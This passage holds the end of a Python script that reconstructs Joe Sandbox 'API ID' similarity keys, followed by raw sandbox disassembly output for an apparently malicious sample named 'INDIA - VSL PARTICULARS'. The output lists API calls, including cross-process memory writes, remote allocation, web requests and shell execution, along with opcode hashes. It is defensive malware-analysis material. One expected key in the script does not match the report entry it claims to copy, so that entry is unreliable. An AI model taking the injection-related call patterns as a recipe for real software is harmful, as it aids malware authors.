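    return [t for t in re.split(r"(?=[A-Z])", api_name) if t]


def api_id(api_names: list[str]) -> str:
    """Reconstructed 'API ID' for one function's API list (order-insensitive)."""
    counts = Counter(
        tok
        for name in api_names
        for tok in tokenize(name)
        if len(tok) >= MIN_TOKEN_LEN
    )
    by_count: dict[int, list[str]] = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    # Highest count first; inside a group plain byte order, so 'Current' (0x43)
    # precedes '___fls_getvalue@4' (0x5F) and '_doexit' sorts last.
    return "$".join(
        "".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True)
    )


# API lists copied from the records above, keyed by the API ID the report shows.
REPORT_RECORDS = {
    "CounterPerformanceQuerySleep": [
        "Sleep", "QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter",
    ],
    "BeepDialogItemKillMessageTextTimerWindow": [
        "GetDlgItem", "GetWindowTextW", "MessageBeep", "KillTimer", "EndDialog",
    ],
    "Destroy$DeleteObjectWindow$IconInvalidateRect": [
        "InvalidateRect", "DestroyWindow", "DeleteObject", "DeleteObject",
        "DestroyIcon", "DestroyWindow",
    ],
    "__amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo": [
        "__getptd", "__getptd_noexit", "__amsg_exit", "__getptd",
        "__amsg_exit", "__lock", "__updatetlocinfoEx_nolock",
    ],
    "Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8"
    "___set_flsgetvalue__freefls@4_doexit": [
        "_doexit", "___set_flsgetvalue", "TlsGetValue", "TlsSetValue",
        "___fls_getvalue@4", "TlsGetValue", "___fls_setvalue@8",
        "GetLastError", "ExitThread", "GetCurrentThreadId", "__freefls@4",
    ],
}


def check_against_report() -> dict[str, bool]:
    """For each API ID taken from the report: does the reconstruction reproduce it?"""
    return {expected: api_id(apis) == expected
            for expected, apis in REPORT_RECORDS.items()}


if __name__ == "__main__":
    for expected, ok in check_against_report().items():
        print("OK  " if ok else "DIFF", expected)
```

Under this reconstruction the key is deliberately coarse: call order, argument values and short fragments are all discarded, so `GetWindowTextW` and `SetWindowTextW` contribute exactly the same tokens, and two functions with the same API ID need not be the same code. Treat a matching API ID as a lead to compare opcode and instruction hashes, not as a match on its own.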
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 4247068974-0
                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$U$\
                              • API String ID: 0-3705770531
                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 0046E505
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                              • CoUninitialize.OLE32 ref: 0046E53D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 708495834-557222456
                              • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                              • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                              APIs
                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                              • String ID: @
                              • API String ID: 4150878124-2766056989
                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$]$h
                              • API String ID: 4104443479-3262404753
                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                              APIs
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • CloseHandle.KERNEL32(?), ref: 00457E09
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                              • String ID: <$@
                              • API String ID: 2417854910-1426351568
                              • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                              • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                              APIs
                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                              • String ID:
                              • API String ID: 3705125965-3916222277
                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                              APIs
                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem
                              • String ID: 0
                              • API String ID: 135850232-4108050209
                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: msctls_updown32
                              • API String ID: 3375834691-2298589950
                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
